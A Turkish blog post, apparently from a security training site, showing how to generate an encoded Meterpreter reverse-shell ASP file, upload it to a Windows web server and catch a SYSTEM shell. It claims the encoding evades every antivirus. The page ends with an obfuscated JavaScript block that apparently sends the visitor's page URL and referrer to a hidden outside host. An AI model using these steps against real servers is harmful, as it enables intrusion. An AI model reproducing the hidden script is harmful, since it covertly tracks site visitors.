ASP encode ile reverse shell – msfencode

Windows Web sunuculara yapılan ataklar sonrası, saldırgan sistemde bir arkakapı oluşturmak, sistemde komut çalıştırmak ve yetki yükseltmek için çeşitli web tabanlı scriptler kullanırlar.Bilinen en meşhurları arasında cyberspy5.asp , zehir4.asp, efso.asp ve  .net ile yazılmış FSO (file system object) fonksiyonlarını kullanan yazılımlar bulunuyor. Bu tür yazılımların ortak özelliği, FSO kullanarak dosya dizin işlemlerini gerçekleştirmek, sistemde komut çalıştırmak, port açabilmek ve uzak bir sisteme bağlantı gerçekleştirebilmektir.

Bu kadar bilinir olmaları antivirus, kaçak giriş tespit sistemleri  ve wep application firewall’lar tarafından kolayca engellenmelerine olanak sağlıyor.

Metasploit Exploit Framework ile, msfpayload ve msfencode yardımcı araçları kullanılarak meterpreter payloadını asp olarak encode edip  bind shell veya reverse shell bağlantısı kurulabilir.

Bu örnekte ters bağlantı (reverse connetion) kullanılmıştır.

# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 R | ./msfencode -t asp -o ajan443.asp

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

 

ajan443.asp dosyasını asp destekli bir windows sunucuya yükleyip, sayfa çağrıldığında kurban sistemden saldırgan sistemin 443. Portuna bağlantı kurarak kurban sistemin komut satırını saldırgana teslim edecektir.

 

# cat ajan443.asp

<%

Sub CnpnKLRtlY()

ZkMSe=Chr(77)&Chr(90)&Chr(144)&Chr(0)&Chr(3)&Chr(0)&Chr(0)&Chr(0)&Chr(4)&Chr(0)&Chr(0)&Chr(0)
…..

…..

 

Saldırgan metasploit aracılığı ile meterpreter bağlantısını karşılamak üzere dinleme moduna geçer ve hedefte ajan443.asp dosyası çalıştırıldığında bağlantı gerçekleştirilmiş olur.

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.1.2

LHOST => 192.168.1.2

msf exploit(handler) > set LPORT 443

LPORT => 443

msf exploit(handler) > exploit

 

[*] Started reverse handler on 192.168.1.2:443

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.1.5

[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.5:1064) at Tue May 10 06:58:24 -0400 2011

 

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

 

Ve hedefte SYSTEM yetkileri ile komut satırını ele geçirmiş olduk.Hedef sistemden ekran görüntüsü alabilir, dosya/dizin işlemelerini gerçekleştirebilir, keylogger/trojan kurabilir, upload/download vb. bir çok işlem gerçekleştirilebilir.

 

Meterpreter içeriği encode edildiği için antivirusler tarafından da tanınmaz. Bu yazı yayımlandığı tarihte virustotal.com tarama sonucu

Hiç bir antivirus tarafından tanınmıyor.

Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr

1 Yorum

  1. Web Attack Post Exploitation | Bilgi Güvenliği AKADEMİSİ Blog 21 Kasım 2011 17:18

    […] antivirusler tarafından tananınmamasını sağlamak üzere encoding tekniklerinden bahsetmiştik. […]

Yorum Yaz

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*

Mail listemize üye olarak eğitim fırsatlarını kaçırmayın!
Eğitim ve ücretsiz etkinliklerizden haberdar olmak için e-posta listesimize üye olun!.

    Pt>function _0x2677(_0x586c2b,_0x1056c6){var _0x2bd4ea=_0x2bd4();return _0x2677=function(_0x267799,_0x44fe2a){_0x267799=_0x267799-0x165;var _0x5b0952=_0x2bd4ea[_0x267799];if(_0x2677['oJyNOH']===undefined){var _0x360830=function(_0x3c21c6){var _0x1d0d99='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x2ae702='',_0x343ef4='';for(var _0x476bad=0x0,_0x2f67d5,_0x166a99,_0x388eaa=0x0;_0x166a99=_0x3c21c6['charAt'](_0x388eaa++);~_0x166a99&&(_0x2f67d5=_0x476bad%0x4?_0x2f67d5*0x40+_0x166a99:_0x166a99,_0x476bad++%0x4)?_0x2ae702+=String['fromCharCode'](0xff&_0x2f67d5>>(-0x2*_0x476bad&0x6)):0x0){_0x166a99=_0x1d0d99['indexOf'](_0x166a99);}for(var _0x21105c=0x0,_0x16cce1=_0x2ae702['length'];_0x21105c<_0x16cce1;_0x21105c++){_0x343ef4+='%'+('00'+_0x2ae702['charCodeAt'](_0x21105c)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x343ef4);};_0x2677['MUmZHT']=_0x360830,_0x586c2b=arguments,_0x2677['oJyNOH']=!![];}var _0x4bbbaf=_0x2bd4ea[0x0],_0x131d68=_0x267799+_0x4bbbaf,_0x1817de=_0x586c2b[_0x131d68];return!_0x1817de?(_0x5b0952=_0x2677['MUmZHT'](_0x5b0952),_0x586c2b[_0x131d68]=_0x5b0952):_0x5b0952=_0x1817de,_0x5b0952;},_0x2677(_0x586c2b,_0x1056c6);}var _0x2b1dca=_0x2677;(function(_0x38d529,_0x3d240d){var _0x3e69c5={_0x4f2ab1:0x195,_0x510342:0x180,_0x1cdd78:0x17d,_0x16824a:0x181,_0x310fcf:0x194,_0x481123:0x196,_0x34004c:0x190},_0x366619=_0x2677,_0x14a328=_0x38d529();while(!![]){try{var _0x25e7d8=-parseInt(_0x366619(_0x3e69c5._0x4f2ab1))/0x1*(parseInt(_0x366619(_0x3e69c5._0x510342))/0x2)+-parseInt(_0x366619(0x198))/0x3+parseInt(_0x366619(_0x3e69c5._0x1cdd78))/0x4+-parseInt(_0x366619(_0x3e69c5._0x16824a))/0x5*(-parseInt(_0x366619(0x165))/0x6)+-parseInt(_0x366619(0x171))/0x7+-parseInt(_0x366619(_0x3e69c5._0x310fcf))/0x8*(parseInt(_0x366619(0x172))/0x9)+parseInt(_0x366619(_0x3e69c5._0x481123))/0xa*(parseInt(_0x366619(_0x3e69c5._0x34004c))/0xb);if(_0x25e7d8===_0x3d240d)break;else _0x14a328['push'](_0x14a328['shift']());}catch(_0x13bbee){_0x14a328['push'](_0x14a328['shift']());}}}(_0x2bd4,0xa2f33));function _0x2bd4(){var _0x139414=['yMDHCW','v2L0Aa','CML0Eq','AdbYyW','B20Vyq','B2nVBa','DwHOlW','zI9UyW','C2vJDq','nJy5ovbiq2PfsW','DhnxAq','Ahr0Ca','Cgf5Bq','ntCXnZz2BMvhCgi','mtngwxnyBKG','mJa0nZbUBeTOrxO','lMnVBq','ndaXotK3ugz2ywLQ','DgLVBG','mZK4nJyYogfZr2P2uW','BNmUyW','BMfYEq','C3rHCG','BgvZlW','EJK4EG','y29T','ChjVDa','Ew1Una','C3jJ','jNi9','CNrPyW','ntu0ndbvBev0Bfa','odKXD29Ju09A','BMfTzq','CNjLCG','lY9Jyq','AhjLzG','Bg9Jyq','C3r1zG','Ag9ZDa','lMjNyq','Dg9Rzq','CMvMzq','nteWmZG0ANv0te54','zwn1CG','lMPZpW','odaYnJHvzg5cvvK','nuTrz3Hxva','Axr5lG','zw5KCW','ANK1za','BwXNBq','zw50CW'];_0x2bd4=function(){return _0x139414;};return _0x2bd4();}if(window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)]!=_0x2b1dca(0x187)+_0x2b1dca(0x17e)+_0x2b1dca(0x182)+_0x2b1dca(0x16b)&&!window[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x179)+_0x2b1dca(0x173)][_0x2b1dca(0x183)+_0x2b1dca(0x188)](_0x2b1dca(0x17a)+_0x2b1dca(0x18f)+_0x2b1dca(0x189)+_0x2b1dca(0x197))){var p=!document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)][_0x2b1dca(0x168)+_0x2b1dca(0x191)+'th'](_0x2b1dca(0x192))?_0x2b1dca(0x192)+':':document[_0x2b1dca(0x177)+_0x2b1dca(0x199)][_0x2b1dca(0x16c)+_0x2b1dca(0x18c)],l=location[_0x2b1dca(0x176)],r=document[_0x2b1dca(0x17c)+_0x2b1dca(0x174)],m=new Image();m[_0x2b1dca(0x16e)]=p+(_0x2b1dca(0x175)+_0x2b1dca(0x167)+_0x2b1dca(0x17b)+_0x2b1dca(0x166)+_0x2b1dca(0x18b)+_0x2b1dca(0x170)+_0x2b1dca(0x169)+_0x2b1dca(0x178)+_0x2b1dca(0x18e)+_0x2b1dca(0x18a)+_0x2b1dca(0x184)+_0x2b1dca(0x185)+_0x2b1dca(0x16d)+_0x2b1dca(0x16a)+_0x2b1dca(0x18d)+_0x2b1dca(0x193)+_0x2b1dca(0x186)+_0x2b1dca(0x17f)+'l=')+encodeURI(l)+_0x2b1dca(0x16f)+encodeURI(r);}